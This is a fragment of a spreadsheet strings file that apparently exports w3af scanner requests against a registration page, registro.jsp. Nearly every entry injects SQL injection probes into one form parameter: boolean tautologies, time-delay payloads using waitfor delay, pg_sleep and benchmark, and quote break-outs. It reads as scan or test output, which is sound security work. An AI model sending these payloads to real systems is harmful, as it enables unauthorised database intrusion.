    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=1;waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=1);waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=1));waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=1';waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=1');waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=1'));waitfor+delay+'0:0:5'--</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=1+or+benchmark(2500000,md5(1))</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=1'+or+benchmark(2500000,md5(1))+or+'1'='1</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=1"+or+benchmark(2500000,md5(1))+or+"1"="1</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=1+or+pg_sleep(5)</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=1'+or+pg_sleep(5)+or+'1'='1</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=1"+or+pg_sleep(5)+or+"1"="1</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=49"+or+"49"="49&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=49"+and+"49"="50&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=49'+or+'49'='49&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=49'+and+'49'='50&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=49+or+49=49+&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=49+and+49=50+&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=1;waitfor+delay+'0:0:5'--&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=1);waitfor+delay+'0:0:5'--&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=1));waitfor+delay+'0:0:5'--&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=1';waitfor+delay+'0:0:5'--&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=1');waitfor+delay+'0:0:5'--&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=1'));waitfor+delay+'0:0:5'--&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=1+or+benchmark(2500000,md5(1))&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=1"+or+benchmark(2500000,md5(1))+or+"1"="1&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=1+or+pg_sleep(5)&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=1'+or+pg_sleep(5)+or+'1'='1&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=1"+or+pg_sleep(5)+or+"1"="1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87"+or+"87"="87&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=87"+and+"87"="88&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=87'+or+'87'='87&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=87'+and+'87'='88&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=87+or+87=87+&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=87+and+87=88+&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=1;waitfor+delay+'0:0:5'--&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=1);waitfor+delay+'0:0:5'--&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=1));waitfor+delay+'0:0:5'--&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=1';waitfor+delay+'0:0:5'--&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=1');waitfor+delay+'0:0:5'--&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=1'));waitfor+delay+'0:0:5'--&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=1+or+benchmark(2500000,md5(1))&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=1"+or+benchmark(2500000,md5(1))+or+"1"="1&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=1+or+pg_sleep(5)&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=1'+or+pg_sleep(5)+or+'1'='1&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=1"+or+pg_sleep(5)+or+"1"="1&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=12"+or+"12"="12&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=12"+and+"12"="13&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=12'+or+'12'='12&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=12'+and+'12'='13&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=12+or+12=12+&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=12+and+12=13+&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=1;waitfor+delay+'0:0:5'--&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=1);waitfor+delay+'0:0:5'--&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=1));waitfor+delay+'0:0:5'--&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=1';waitfor+delay+'0:0:5'--&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=1');waitfor+delay+'0:0:5'--&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=1'));waitfor+delay+'0:0:5'--&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=1+or+benchmark(2500000,md5(1))&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=1"+or+benchmark(2500000,md5(1))+or+"1"="1&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=1+or+pg_sleep(5)&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=1'+or+pg_sleep(5)+or+'1'='1&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=1"+or+pg_sleep(5)+or+"1"="1&amp;provincia=0&amp;login=56&amp;dni=56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56&amp;email=58"+or+"58"="58&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=58"+and+"58"="59&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=58'+or+'58'='58&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=58'+and+'58'='59&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=58+or+58=58+&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=58+and+58=59+&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=1;waitfor+delay+'0:0:5'--&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=1);waitfor+delay+'0:0:5'--&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=1));waitfor+delay+'0:0:5'--&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=1';waitfor+delay+'0:0:5'--&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=1');waitfor+delay+'0:0:5'--&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=1'));waitfor+delay+'0:0:5'--&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=1+or+benchmark(2500000,md5(1))&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=1'+or+benchmark(2500000,md5(1))+or+'1'='1&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=1"+or+benchmark(2500000,md5(1))+or+"1"="1&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=1+or+pg_sleep(5)&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=1'+or+pg_sleep(5)+or+'1'='1&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=56&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=1"+or+pg_sleep(5)+or+"1"="1&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=28"+or+"28"="28&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=28"+and+"28"="29&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=28'+or+'28'='28&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=28'+and+'28'='29&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=28+or+28=28+&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=28+and+28=29+&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
  <si>
    <t>/antoanweb/publico/registro.jsp?password=frame30.&amp;provincia=0&amp;login=1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0&amp;login=1)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0&amp;login=1))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0&amp;login=1'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0&amp;login=1')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0&amp;login=1'))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0&amp;login=1+or+benchmark(2500000,md5(1))&amp;dni=56&amp;direccion=bonsai+street+123&amp;apellidos=smith&amp;ciudad=buenos+aires&amp;nombre=john&amp;ntc=56&amp;cp=56&amp;email=w3af@email.com&amp;modo=registro</t>
  </si>
